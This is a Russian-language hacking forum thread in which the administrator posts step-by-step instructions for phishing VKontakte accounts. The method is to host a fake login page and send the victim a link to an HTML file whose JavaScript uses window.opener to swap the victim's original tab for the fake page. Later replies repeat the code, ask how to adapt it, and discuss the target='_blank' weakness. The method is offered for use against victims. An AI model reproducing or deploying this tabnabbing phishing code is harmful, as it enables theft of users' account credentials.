Схема по которой работают "взломщики" ВК

Admin

Administrator
Сообщения
840
Оценка реакций
617
Новое Тема слита, так что о 100% работе говорить не буду!
Не давно на форуме увидел пару человек , которые предоставляют услуги по взлому аккаунтов в социальной сети ВКонтакте.

Было решено провести тест , и не пожалев денег заказал услугу по взлому собственной страницы.

Человек добавил меня , и скинул ссылку якобы на мою фотографию (домен был не бесплатный) , я перешёл и увидел что родительская вкладка была заменена на фейковую , и после чего мне выдало окно авторизации ВКонтакте.

Здесь все становиться ясно , и ниже я если можно так сказать "солью" способ взлома.


1. Регистрируем любой хостинг аккаунт (можно и с бесплатным доменом).
2. Далее закидаем фейковую страницу в корень , и после чего создаем файл window.htm (можете использовать любое название).
3. Открываем наш только созданный файл через редактор , и пишем следующий код:
Код:
<html>
<head>
<title></title>
</head>
<body>
<script language="JavaScript">
  if(parent.window.opener) parent.window.opener.location.replace("http://site.in"); // Ссылка на фейк.
  document.location.href = "http://site.in"; // Ссылка для отводки глаз жертвы.
</script>
</body>
</html>
Готово ! По данному принципу работает множество "взломщиков". Пользуемся
 

HARD_RESET

Pro Member
Сообщения
233
Оценка реакций
149
Если моя фейка страница размещена в корне моего сайта (localhost) ,т.е при открытии localhost открывает сразу нее,то код будет иметь подобный вид ?
Код:
<html>
<head>
<title></title>
</head>
<body>
<script language="JavaScript">
  if(parent.window.opener) parent.window.opener.location.replace("http://localhost/"); // Ссылка на фейк.
  document.location.href = "https://vk.com/feed"; // Ссылка для отводки глаз жертвы.
</script>
</body>
</html>
?
Что за "Ссылка для отводки глаз жертвы." ? Что то не могу разобраться,вроде сделал все как нужно,но результат получил не тот который "скорее всего" должен быть . Какой именно линк кидать жертве ? На этот файл "window.htm" ?

P.S #послеНовогоднийПротуп
 

evgenii999

Member
Сообщения
7
Оценка реакций
1
Новое Тема слита, так что о 100% работе говорить не буду!
Не давно на форуме увидел пару человек , которые предоставляют услуги по взлому аккаунтов в социальной сети ВКонтакте.

Было решено провести тест , и не пожалев денег заказал услугу по взлому собственной страницы.

Человек добавил меня , и скинул ссылку якобы на мою фотографию (домен был не бесплатный) , я перешёл и увидел что родительская вкладка была заменена на фейковую , и после чего мне выдало окно авторизации ВКонтакте.

Здесь все становиться ясно , и ниже я если можно так сказать "солью" способ взлома.


1. Регистрируем любой хостинг аккаунт (можно и с бесплатным доменом).
2. Далее закидаем фейковую страницу в корень , и после чего создаем файл window.htm (можете использовать любое название).
3. Открываем наш только созданный файл через редактор , и пишем следующий код:
Код:
<html>
<head>
<title></title>
</head>
<body>
<script language="JavaScript">
  if(parent.window.opener) parent.window.opener.location.replace("http://site.in"); // Ссылка на фейк.
  document.location.href = "http://site.in"; // Ссылка для отводки глаз жертвы.
</script>
</body>
</html>
Готово ! По данному принципу работает множество "взломщиков". Пользуемся
Добрый вечер! У меня есть вопрос по данной теме. Смысл же в том, что ссылка "для отвода глаз" должна вести же на фейк как я понял, вы пробовали этот метод? а
 

pw0ned

Pro Member
Сообщения
51
Оценка реакций
34
Добрый вечер! У меня есть вопрос по данной теме. Смысл же в том, что ссылка "для отвода глаз" должна вести же на фейк как я понял, вы пробовали этот метод? а
window.opener не работает в браузерах, и уже давно.
Как вариант если на сайте присутствует target="_blank" vulnerability, тогда без проблем, но в ВК это пофикшено пару месяцев назад.

Если кому интересно, вот наглядный пример использования уязвимости в сервисе Web.Skype

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.